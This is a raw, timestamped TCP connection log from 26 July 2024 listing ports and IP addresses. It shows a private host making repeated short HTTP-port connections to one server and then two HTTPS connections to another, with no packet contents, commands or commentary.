Jul 26, 2024 21:01:18.457251072 CEST	49749	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:18.458245993 CEST	49749	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:18.466412067 CEST	80	49749	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:18.742748022 CEST	80	49749	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:18.742840052 CEST	49749	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:18.857662916 CEST	49749	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:18.858501911 CEST	49750	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:18.877088070 CEST	80	49750	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:18.877232075 CEST	49750	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:18.877486944 CEST	49750	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:18.887631893 CEST	80	49749	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:18.887809038 CEST	49749	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:18.895104885 CEST	80	49750	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:19.664840937 CEST	80	49750	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:19.664936066 CEST	49750	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:19.666033030 CEST	49750	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:19.671011925 CEST	80	49750	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:19.948873997 CEST	80	49750	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:19.948972940 CEST	49750	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:20.060635090 CEST	49750	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:20.061183929 CEST	49751	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:20.074985027 CEST	80	49751	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:20.077089071 CEST	80	49750	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:20.077121973 CEST	49751	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:20.077147961 CEST	49750	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:20.077352047 CEST	49751	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:20.083873987 CEST	80	49751	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:20.856426001 CEST	80	49751	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:20.856519938 CEST	49751	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:20.857820034 CEST	49751	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:21.091538906 CEST	49751	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:21.126024008 CEST	80	49751	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:21.126971960 CEST	49751	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:21.128945112 CEST	80	49751	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:21.128957987 CEST	80	49751	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:21.389045954 CEST	80	49751	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:21.389182091 CEST	49751	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:21.500793934 CEST	49751	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:21.501099110 CEST	49752	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:21.506145000 CEST	80	49751	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:21.506222963 CEST	49751	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:21.506524086 CEST	80	49752	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:21.506597996 CEST	49752	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:21.506738901 CEST	49752	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:21.511492014 CEST	80	49752	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:22.530749083 CEST	80	49752	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:22.530883074 CEST	49752	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:22.531707048 CEST	49752	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:22.562088966 CEST	80	49752	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:22.562163115 CEST	49752	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:22.575084925 CEST	80	49752	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:22.826242924 CEST	80	49752	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:22.826380968 CEST	49752	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:22.936013937 CEST	49752	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:22.936422110 CEST	49753	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:22.946137905 CEST	80	49753	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:22.946249962 CEST	49753	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:22.946367025 CEST	49753	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:22.975054026 CEST	80	49753	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:22.984307051 CEST	80	49752	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:22.984524965 CEST	49752	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:23.752993107 CEST	80	49753	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:23.753103018 CEST	49753	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:23.753861904 CEST	49753	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:23.758855104 CEST	80	49753	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:24.008508921 CEST	80	49753	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:24.008594990 CEST	49753	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:24.126708031 CEST	49753	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:24.126905918 CEST	49754	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:24.131866932 CEST	80	49754	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:24.131951094 CEST	49754	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:24.132105112 CEST	49754	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:24.133407116 CEST	80	49753	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:24.133461952 CEST	49753	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:24.137183905 CEST	80	49754	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:24.963284016 CEST	80	49754	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:24.963357925 CEST	49754	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:24.963937998 CEST	49754	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:24.973078012 CEST	80	49754	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:25.226752043 CEST	80	49754	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:25.226933956 CEST	49754	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:25.341768026 CEST	49754	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:25.342101097 CEST	49755	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:25.363493919 CEST	80	49755	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:25.363571882 CEST	49755	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:25.363684893 CEST	49755	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:25.369005919 CEST	80	49754	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:25.369062901 CEST	49754	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:25.371999979 CEST	80	49755	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:26.120713949 CEST	80	49755	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:26.120780945 CEST	49755	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:26.121455908 CEST	49755	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:26.126708031 CEST	80	49755	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:26.369308949 CEST	80	49755	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:26.369405031 CEST	49755	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:26.482438087 CEST	49755	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:26.482738972 CEST	49756	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:26.488408089 CEST	80	49756	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:26.488513947 CEST	49756	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:26.488661051 CEST	49756	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:26.489908934 CEST	80	49755	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:26.489984989 CEST	49755	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:26.497864008 CEST	80	49756	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:27.284193039 CEST	80	49756	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:27.284259081 CEST	49756	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:27.285096884 CEST	49756	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:27.290292025 CEST	80	49756	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:27.536617041 CEST	80	49756	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:27.536761999 CEST	49756	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:27.654398918 CEST	49756	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:27.654712915 CEST	49757	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:27.660798073 CEST	80	49757	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:27.660892963 CEST	49757	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:27.660978079 CEST	49757	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:27.662553072 CEST	80	49756	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:27.662626982 CEST	49756	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:27.692311049 CEST	80	49757	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:28.482247114 CEST	80	49757	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:28.482321024 CEST	49757	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:28.483134031 CEST	49757	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:28.488538980 CEST	80	49757	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:28.733627081 CEST	80	49757	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:28.733778954 CEST	49757	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:28.841903925 CEST	49757	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:28.842236996 CEST	49758	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:28.847179890 CEST	80	49758	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:28.847235918 CEST	49758	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:28.847389936 CEST	49758	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:28.847496033 CEST	80	49757	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:28.847546101 CEST	49757	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:28.852498055 CEST	80	49758	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:29.605577946 CEST	80	49758	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:29.605732918 CEST	49758	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:29.606386900 CEST	49758	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:29.611191034 CEST	80	49758	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:29.862056971 CEST	80	49758	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:29.862152100 CEST	49758	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:29.967006922 CEST	49758	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:29.967318058 CEST	49759	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:29.972179890 CEST	80	49759	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:29.972301006 CEST	49759	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:29.972367048 CEST	80	49758	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:29.972399950 CEST	49759	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:29.972413063 CEST	49758	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:29.978600025 CEST	80	49759	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:30.809070110 CEST	80	49759	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:30.809190989 CEST	49759	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:30.814605951 CEST	49759	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:30.820194960 CEST	80	49759	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:31.069098949 CEST	80	49759	185.215.113.19	192.168.2.4
Jul 26, 2024 21:01:31.069210052 CEST	49759	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:01:31.110244989 CEST	49760	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:31.110280037 CEST	443	49760	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:31.110373974 CEST	49760	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:31.172703981 CEST	49760	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:31.172724962 CEST	443	49760	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:31.851214886 CEST	443	49760	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:31.851347923 CEST	49760	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:32.006436110 CEST	49760	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:32.006452084 CEST	443	49760	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:32.006793022 CEST	443	49760	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:32.006854057 CEST	49760	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:32.033780098 CEST	49760	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:32.080519915 CEST	443	49760	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:32.205363035 CEST	443	49760	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:32.205435038 CEST	49760	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:32.205442905 CEST	443	49760	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:32.205492020 CEST	49760	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:32.205815077 CEST	49760	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:32.205828905 CEST	443	49760	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:32.234981060 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:32.235018015 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:32.235929012 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:32.235929012 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:32.235965014 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:32.960083008 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:32.960141897 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:32.960613012 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:32.960618973 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:32.960802078 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:32.960807085 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.203789949 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.203824997 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.203908920 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.203927040 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.203938007 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.203975916 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.278745890 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.278870106 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.290916920 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.291048050 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.291975975 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.292066097 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.292929888 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.293009996 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.354284048 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.354723930 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.378001928 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.378230095 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.378916025 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.379062891 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.379070997 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.379163027 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.380074024 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.380400896 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.380884886 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.380960941 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.381784916 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.381897926 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.427158117 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.427366018 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.442070007 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.442290068 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.465982914 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.466121912 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.466362953 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.466461897 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.466948032 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.467068911 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.467164993 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.467297077 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.467972040 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.468038082 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.468492985 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.468559027 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.468884945 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.468950033 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.469969988 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.470040083 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.470480919 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.470575094 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.470956087 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.471014023 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.471035957 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.471049070 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.471081972 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.471256971 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.517807961 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.517880917 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.529038906 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.529120922 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.529870987 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.530020952 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.540585995 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.540831089 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.553662062 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.553734064 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.553931952 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.553997040 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.554363966 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.554498911 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.554514885 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.554522038 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.554560900 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.554579973 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.555264950 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.555337906 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.555360079 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.555367947 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.555408001 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.555408001 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.555986881 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.556051016 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.556355953 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.556461096 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.556808949 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.556869030 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.559343100 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.559453011 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.559674978 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.559740067 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.559896946 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.559983969 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.601388931 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.601527929 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.616808891 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.616909027 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.617294073 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.617451906 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.627873898 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.627979040 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.641143084 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.641222000 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.641599894 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.641650915 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.641664982 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.641684055 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.641721964 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.641721964 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.642357111 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.642419100 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.643028021 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.643094063 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.643929005 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.643986940 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.644035101 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.644035101 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.644049883 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.644134045 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.644817114 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.644865036 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.644932032 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.644932032 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.644939899 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.645030022 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.645855904 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.645901918 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.645926952 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.645936966 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.645973921 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.645973921 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.646784067 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.646855116 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.690551043 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.690821886 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.704730988 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.704823971 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.704860926 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.704941034 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.705178022 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.705244064 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.716602087 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.716711044 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.728220940 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.728322029 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.728598118 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.728660107 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.729003906 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.729073048 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.729484081 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.729609013 CEST	49761	443	192.168.2.4	93.93.131.124
Jul 26, 2024 21:01:33.730004072 CEST	443	49761	93.93.131.124	192.168.2.4
Jul 26, 2024 21:01:33.730084896 CEST	49761	443	192.168.2.4	93.93.131.124
